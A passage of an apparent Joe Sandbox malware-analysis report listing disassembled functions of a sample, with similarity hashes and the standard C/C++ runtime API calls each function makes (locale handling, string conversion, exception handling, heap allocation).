                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: e7acbe54955f26cea3d96212787b6dacb706edb25820ffcb4b951e1b31c1cf72
                            • Instruction ID: 8e9d630e9caaad6141cad2bdbcc72d24dcd98183a59153feea394b564c507666
                            • Opcode Fuzzy Hash: e7acbe54955f26cea3d96212787b6dacb706edb25820ffcb4b951e1b31c1cf72
                            • Instruction Fuzzy Hash: 2FB106765007118BDB3ADF24DD82AB7B3A8EF64308F55452DEA8386580EBB5E981CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f46c0e91adab112642c3e90fed2600fbcfb01e74a8d2e52180c0110742978013
                            • Instruction ID: 1dce619828b898fe13df8b8ee784b10a9d76fe8726bf0fb7e6b0e73669b23752
                            • Opcode Fuzzy Hash: f46c0e91adab112642c3e90fed2600fbcfb01e74a8d2e52180c0110742978013
                            • Instruction Fuzzy Hash: 1741B132B21A118BD718CE3CC8526A6B7E5FB98310F198B7DE42AC73C1D734AD058B84
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction ID: 541b97f2c18f1582727c3137f986e6837cc8b3c6c9d3cafb87b795f92ee3d370
                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction Fuzzy Hash: B7113DBB30304283D617CA3FD4B86B7E795EBC532176F4BBAD1414B7D4D122E9459500
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030972F
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030984D
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003098E4
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00309907
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030990C
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00309911
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name$false$true
                            • API String ID: 2199893758-1062449267
                            • Opcode ID: 49f549e3f96a8e446d8bcc31b82cf8b07409ab9a282ebd4f1f293d84272f1460
                            • Instruction ID: 2f73f1003e3dc3af47bbbb3207ef467fae54084b13667e00be489bdb287f76b3
                            • Opcode Fuzzy Hash: 49f549e3f96a8e446d8bcc31b82cf8b07409ab9a282ebd4f1f293d84272f1460
                            • Instruction Fuzzy Hash: E1618FB49013489BEF22DFA4D855B9EBBB4AF05300F14812DE808AF382E7B5DA45CB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: b8bad6860940e0e7bb2577a03442faa595405026bac0e86e334fa4d534f346f1
                            • Instruction ID: f669370deed23efae4ef83235fc3e16b79b5ec02195a03d7282fdbb1ae6d2c2a
                            • Opcode Fuzzy Hash: b8bad6860940e0e7bb2577a03442faa595405026bac0e86e334fa4d534f346f1
                            • Instruction Fuzzy Hash: 96B1E670A086099FDB1BDFA8D881BEE7BB5FF4E314F154159E5019B392C770A981CBA0
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0030CBF1
                            • __alloca_probe_16.LIBCMT ref: 0030CC1D
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0030CC5C
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030CC79
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0030CCB8
                            • __alloca_probe_16.LIBCMT ref: 0030CCD5
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0030CD17
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0030CD3A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                            • String ID:
                            • API String ID: 2040435927-0
                            • Opcode ID: 63deaa3650a3bf956e76321c2e066cdf4a2f55aba4b689db71807641fe66c021
                            • Instruction ID: fd121f0cf9dad972a1fbd59c8fc102311156752621be82fbdef6754e1b1e16e5
                            • Opcode Fuzzy Hash: 63deaa3650a3bf956e76321c2e066cdf4a2f55aba4b689db71807641fe66c021
                            • Instruction Fuzzy Hash: AE51BE72522206ABEB228F64CC55FEB7BA9EF44740F154628F915EA1E0D734CC019BA0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID:
                            • API String ID: 3213747228-0
                            • Opcode ID: 55ae62c56f390a00837b9fb55f96d229920877030498453fd125425627efc205
                            • Instruction ID: 903a706be1e81ccd9e52807eeb5402d197d8672642035d6fa90a10fb408313bc
                            • Opcode Fuzzy Hash: 55ae62c56f390a00837b9fb55f96d229920877030498453fd125425627efc205
                            • Instruction Fuzzy Hash: E8B17872A042659FDB1BCF28DCA1BEE7BE5EF5D310F158156E844AF282D270D981C7A0
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00310613
                            • ___TypeMatch.LIBVCRUNTIME ref: 0031071E
                            • CallUnexpected.LIBVCRUNTIME ref: 0031088C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 1206542248-393685449
                            • Opcode ID: 4b91fd3ad8db1f97f1648b0c266565681778c13e6a694e4c91e40d0a7655091d
                            • Instruction ID: 663ba3bdf730da2dc94d1b57a408be62fc19aecc309d5a086666b2f72794bb8d
                            • Opcode Fuzzy Hash: 4b91fd3ad8db1f97f1648b0c266565681778c13e6a694e4c91e40d0a7655091d
                            • Instruction Fuzzy Hash: 38B14771800209AFCF1EDFA4C9819EEB7B5BF58310B11456AE8146B252D7B4EAE1CF91
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 0030FFF7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0030FFFF
                            • _ValidateLocalCookies.LIBCMT ref: 00310088
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 003100B3
                            • _ValidateLocalCookies.LIBCMT ref: 00310108
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 2e04353876eb6b7f5109acb4fc71564f34585b8f5f0afd4b160ab6726e8d9a42
                            • Instruction ID: c6a74ca57d86eec2b42124e5bdb828a0182349850f46d98f2bab4fec5f96370a
                            • Opcode Fuzzy Hash: 2e04353876eb6b7f5109acb4fc71564f34585b8f5f0afd4b160ab6726e8d9a42
                            • Instruction Fuzzy Hash: 0541C534A002089FCF1ADF68C881BDEBBA5BF0D314F158065E9185B352D775EA95CB90
                            APIs
                            • GetLastError.KERNEL32(?,?,0031017B,0030E32B,0030D955), ref: 00310192
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003101A0
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003101B9
                            • SetLastError.KERNEL32(00000000,0031017B,0030E32B,0030D955), ref: 0031020B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 97875e542886928a479ed3c9d1e6c6a7a0e96a2fcd12e73b0cecdbfce66e13d6
                            • Instruction ID: 1cae698d8088dd4ad624a974d0f0012ee8644f248cfd6f47d663e04f028ab63a
                            • Opcode Fuzzy Hash: 97875e542886928a479ed3c9d1e6c6a7a0e96a2fcd12e73b0cecdbfce66e13d6
                            • Instruction Fuzzy Hash: 2501F53650D3156EEA2F26B87DC6AEB2A48EB0D770FA00739F520484F2EF954CC59140
                            APIs
                            • __EH_prolog3.LIBCMT ref: 0030B622
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030B62C
                            • int.LIBCPMT ref: 0030B643
                              • Part of subcall function 00301E90: std::_Lockit::_Lockit.LIBCPMT ref: 00301EA1
                              • Part of subcall function 00301E90: std::_Lockit::~_Lockit.LIBCPMT ref: 00301EBB
                            • codecvt.LIBCPMT ref: 0030B666
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030B69D
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030B6AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskH_prolog3codecvt
                            • String ID:
                            • API String ID: 2746682151-0
                            • Opcode ID: 2bf81d67d81b9b1c0299dd765fbfc7f3380833b67c3025dfa89fa84777a1da81
                            • Instruction ID: 7d928e1984984f1692c0b155cc17b6719e0b1de76db0e266879be00340c864b9
                            • Opcode Fuzzy Hash: 2bf81d67d81b9b1c0299dd765fbfc7f3380833b67c3025dfa89fa84777a1da81
                            • Instruction Fuzzy Hash: 17018035A021199FCB07EBA4C8656BDB7A9BF81320F254509F9156F2D1CF71AA058B80
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302019
                            • __Getctype.LIBCPMT ref: 0030207E
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030209A
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030212F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name
                            • API String ID: 3327844093-1405518554
                            • Opcode ID: 2054260a67269d52ac8163d300d9785c3c41294a805ca979fb764ea2aba7463d
                            • Instruction ID: 14ce0e75a4a3fe5079bc163ef43e5eafbe54491e91adb84d6686ae5810eaf6d3
                            • Opcode Fuzzy Hash: 2054260a67269d52ac8163d300d9785c3c41294a805ca979fb764ea2aba7463d
                            • Instruction Fuzzy Hash: D051A2B1D053489BDF11DFE4D855B8EFBB8AF14700F144129E804AB281E775EA48CBA2
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,84FDAC87,?,?,00000000,0032B6CB,000000FF,?,00311A6C,?,?,00311A40,00000016), ref: 00311AC5
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00311AD7
                            • FreeLibrary.KERNEL32(00000000,?,00000000,0032B6CB,000000FF,?,00311A6C,?,?,00311A40,00000016), ref: 00311AF9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: fda0cf8fe93bf8d79af105b719163f8e56a6af782350a1de62fb36ec19361ed6
                            • Instruction ID: 6e1045ab380ac6866ac933cd8c178ea3c6cc8b22d22e98157be99f0906b83486
                            • Opcode Fuzzy Hash: fda0cf8fe93bf8d79af105b719163f8e56a6af782350a1de62fb36ec19361ed6
                            • Instruction Fuzzy Hash: ED01DB71950626EFCB278F44DD05BEEBBBDFF04B54F000529F911A22A0DBB49900CA90
                            APIs
                            • __alloca_probe_16.LIBCMT ref: 0031EBE3
                            • __alloca_probe_16.LIBCMT ref: 0031ECAC
                            • __freea.LIBCMT ref: 0031ED13
                              • Part of subcall function 0031977E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0030E127,?,?,?,?,?,00301103,?,?), ref: 003197B0
                            • __freea.LIBCMT ref: 0031ED26
                            • __freea.LIBCMT ref: 0031ED33
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 1423051803-0
                            • Opcode ID: c56f8300e5ebd9d239acdba053bc9ec9eaa3a844af39e43079a234a0eafce3b6
                            • Instruction ID: 96875a9e43826ad74fe234f88a71ebb6e900b7ea189f45c916da83108fc8895d
                            • Opcode Fuzzy Hash: c56f8300e5ebd9d239acdba053bc9ec9eaa3a844af39e43079a234a0eafce3b6
                            • Instruction Fuzzy Hash: 5951B4B261020AAFDB2B5F64DC41EFB7BADDF4C710F160929FD05DA151EA72DC9086A0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003091D3
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003091F6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00309216
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003092A3
                            • Concurrency::cancel_current_task.LIBCPMT ref: 003092BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            • Opcode ID: d09178f85fa5e04cb7f0deaabc95d8ce747396867ac6916a9b0a1f661ca8297a
                            • Instruction ID: 757acda84aac04069065b01593d61a4fd113556a1823356b838ba555a9961e3d
                            • Opcode Fuzzy Hash: d09178f85fa5e04cb7f0deaabc95d8ce747396867ac6916a9b0a1f661ca8297a
                            • Instruction Fuzzy Hash: 6B31C275902219DFCB27DF54D85076EB778FB01720F15465AE9056B392DB30AD44CBD0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308B23
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308B46
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308B66
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308BF3
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00308C0B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            • Opcode ID: bdb39cd9799f77f2478b9dde26c9b188780e13e053a0a089da9182e825f8086c
                            • Instruction ID: 1b99affe7e42c9c0c1de72782d715dfe878fd903c9d909d250f36c800f8c49d1
                            • Opcode Fuzzy Hash: bdb39cd9799f77f2478b9dde26c9b188780e13e053a0a089da9182e825f8086c
                            • Instruction Fuzzy Hash: 7931E1B5A022158FCB27DF44D860AAEBBB4FB05320F154269E9856B392DB30BD05CBD0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308693
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003086B6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003086D6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308763
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030877B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            • Opcode ID: 786c8924f89008ec652cc8ef7b338e31f228b5455902ff1d125a50d3d2b06697
                            • Instruction ID: 125ca33abcff237d661731a14cc1f494265c30b1ff3c226920642cc46736d941
                            • Opcode Fuzzy Hash: 786c8924f89008ec652cc8ef7b338e31f228b5455902ff1d125a50d3d2b06697
                            • Instruction Fuzzy Hash: 5631E179A0121ACFCB17CF44D890AAEBB78FB01720F250259E9456B392DB30BD44CBD0
                            APIs
                            • __EH_prolog3.LIBCMT ref: 0030C46C
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030C477
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030C4E5
                              • Part of subcall function 0030C5C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0030C5E1
                            • std::locale::_Setgloballocale.LIBCPMT ref: 0030C492
                            • _Yarn.LIBCPMT ref: 0030C4A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: 2c90f4942aa31347d702cf8e7a870656673abddfcfaf1c47483658c094ce7a64
                            • Instruction ID: 86f3c3836e0342a03fca13123ce7adacbfc9a11fa8a71e6b597ef53e229b02c6
                            • Opcode Fuzzy Hash: 2c90f4942aa31347d702cf8e7a870656673abddfcfaf1c47483658c094ce7a64
                            • Instruction Fuzzy Hash: C2019A796122209BC70BEB609C6697C7B69BF86300F145009E9015B3D1CF34AE02CBC0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _strcspn
                            • String ID: <3$<3
                            • API String ID: 3709121408-544789574
                            • Opcode ID: 071e9a408d6d56a26dfb34ee5547a62e6f2816c54c2d37f3122c2e9393cb7ab7
                            • Instruction ID: 33037e70282648c96d64547106a8626199fa4207a0ea288b3a2e7bd18c0bddff
                            • Opcode Fuzzy Hash: 071e9a408d6d56a26dfb34ee5547a62e6f2816c54c2d37f3122c2e9393cb7ab7
                            • Instruction Fuzzy Hash: 19E1A071A01149DFDF05CFA8C8A4AEEBBB6FF48304F148159E955AB292D731ED41CB60
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00309988
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003099F3
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00309A8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
